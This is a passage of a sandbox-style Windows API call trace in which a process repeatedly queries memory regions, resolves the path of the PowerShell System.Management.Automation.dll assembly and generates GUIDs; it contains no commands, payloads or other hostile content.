	[0343.156] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0343.156] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.156] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.156] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.156] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.156] VirtualQuery (in: lpAddress=0x1ab890, lpBuffer=0x1ac750, dwLength=0x30 | out: lpBuffer=0x1ac750*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.157] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.157] VirtualQuery (in: lpAddress=0x1ab890, lpBuffer=0x1ac750, dwLength=0x30 | out: lpBuffer=0x1ac750*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.158] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.158] VirtualQuery (in: lpAddress=0x1ab890, lpBuffer=0x1ac750, dwLength=0x30 | out: lpBuffer=0x1ac750*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.159] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.159] VirtualQuery (in: lpAddress=0x1ab890, lpBuffer=0x1ac750, dwLength=0x30 | out: lpBuffer=0x1ac750*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.161] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.161] VirtualQuery (in: lpAddress=0x1ab890, lpBuffer=0x1ac750, dwLength=0x30 | out: lpBuffer=0x1ac750*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.161] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.161] VirtualQuery (in: lpAddress=0x1ab890, lpBuffer=0x1ac750, dwLength=0x30 | out: lpBuffer=0x1ac750*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.162] VirtualQuery (in: lpAddress=0x1ab7f0, lpBuffer=0x1ac6b0, dwLength=0x30 | out: lpBuffer=0x1ac6b0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.162] VirtualQuery (in: lpAddress=0x1ab880, lpBuffer=0x1ac740, dwLength=0x30 | out: lpBuffer=0x1ac740*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.162] VirtualQuery (in: lpAddress=0x1ab7f0, lpBuffer=0x1ac6b0, dwLength=0x30 | out: lpBuffer=0x1ac6b0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.163] VirtualQuery (in: lpAddress=0x1ab880, lpBuffer=0x1ac740, dwLength=0x30 | out: lpBuffer=0x1ac740*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.163] VirtualQuery (in: lpAddress=0x1ab880, lpBuffer=0x1ac740, dwLength=0x30 | out: lpBuffer=0x1ac740*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.163] VirtualQuery (in: lpAddress=0x1ab7f0, lpBuffer=0x1ac6b0, dwLength=0x30 | out: lpBuffer=0x1ac6b0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.163] VirtualQuery (in: lpAddress=0x1ab880, lpBuffer=0x1ac740, dwLength=0x30 | out: lpBuffer=0x1ac740*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.163] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x150bb0b9, Data2=0x44ab, Data3=0x49e9, Data4=([0]=0xaf, [1]=0x65, [2]=0xcb, [3]=0x21, [4]=0x15, [5]=0xbb, [6]=0x2c, [7]=0xb4))) returned 0x0
	[0343.163] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.163] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.164] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.164] VirtualQuery (in: lpAddress=0x1ab7f0, lpBuffer=0x1ac6b0, dwLength=0x30 | out: lpBuffer=0x1ac6b0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.164] VirtualQuery (in: lpAddress=0x1ab880, lpBuffer=0x1ac740, dwLength=0x30 | out: lpBuffer=0x1ac740*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.164] VirtualQuery (in: lpAddress=0x1ab7f0, lpBuffer=0x1ac6b0, dwLength=0x30 | out: lpBuffer=0x1ac6b0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.164] VirtualQuery (in: lpAddress=0x1ab880, lpBuffer=0x1ac740, dwLength=0x30 | out: lpBuffer=0x1ac740*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.164] VirtualQuery (in: lpAddress=0x1ab880, lpBuffer=0x1ac740, dwLength=0x30 | out: lpBuffer=0x1ac740*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.164] VirtualQuery (in: lpAddress=0x1ab7f0, lpBuffer=0x1ac6b0, dwLength=0x30 | out: lpBuffer=0x1ac6b0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.164] VirtualQuery (in: lpAddress=0x1ab880, lpBuffer=0x1ac740, dwLength=0x30 | out: lpBuffer=0x1ac740*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.165] VirtualQuery (in: lpAddress=0x1ab7f0, lpBuffer=0x1ac6b0, dwLength=0x30 | out: lpBuffer=0x1ac6b0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.165] VirtualQuery (in: lpAddress=0x1ab880, lpBuffer=0x1ac740, dwLength=0x30 | out: lpBuffer=0x1ac740*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.165] VirtualQuery (in: lpAddress=0x1ab7f0, lpBuffer=0x1ac6b0, dwLength=0x30 | out: lpBuffer=0x1ac6b0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.165] VirtualQuery (in: lpAddress=0x1ab880, lpBuffer=0x1ac740, dwLength=0x30 | out: lpBuffer=0x1ac740*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.165] VirtualQuery (in: lpAddress=0x1ab4c0, lpBuffer=0x1ac380, dwLength=0x30 | out: lpBuffer=0x1ac380*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.165] VirtualQuery (in: lpAddress=0x1ab7f0, lpBuffer=0x1ac6b0, dwLength=0x30 | out: lpBuffer=0x1ac6b0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.165] VirtualQuery (in: lpAddress=0x1ab880, lpBuffer=0x1ac740, dwLength=0x30 | out: lpBuffer=0x1ac740*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.165] VirtualQuery (in: lpAddress=0x1ab7f0, lpBuffer=0x1ac6b0, dwLength=0x30 | out: lpBuffer=0x1ac6b0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.166] VirtualQuery (in: lpAddress=0x1ab880, lpBuffer=0x1ac740, dwLength=0x30 | out: lpBuffer=0x1ac740*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.166] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x6d003d61, Data2=0x33f0, Data3=0x44ab, Data4=([0]=0xb5, [1]=0x6, [2]=0x91, [3]=0xc2, [4]=0x8a, [5]=0x4f, [6]=0xf3, [7]=0x16))) returned 0x0
	[0343.166] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xbcae6d3c, Data2=0xe9b0, Data3=0x4b56, Data4=([0]=0x83, [1]=0x88, [2]=0x9f, [3]=0xce, [4]=0xd9, [5]=0x1d, [6]=0x34, [7]=0x55))) returned 0x0
	[0343.166] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xa5dcaef2, Data2=0x1ea2, Data3=0x4d49, Data4=([0]=0x97, [1]=0x37, [2]=0x57, [3]=0x74, [4]=0x34, [5]=0x37, [6]=0x19, [7]=0x5b))) returned 0x0
	[0343.166] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.166] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.166] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
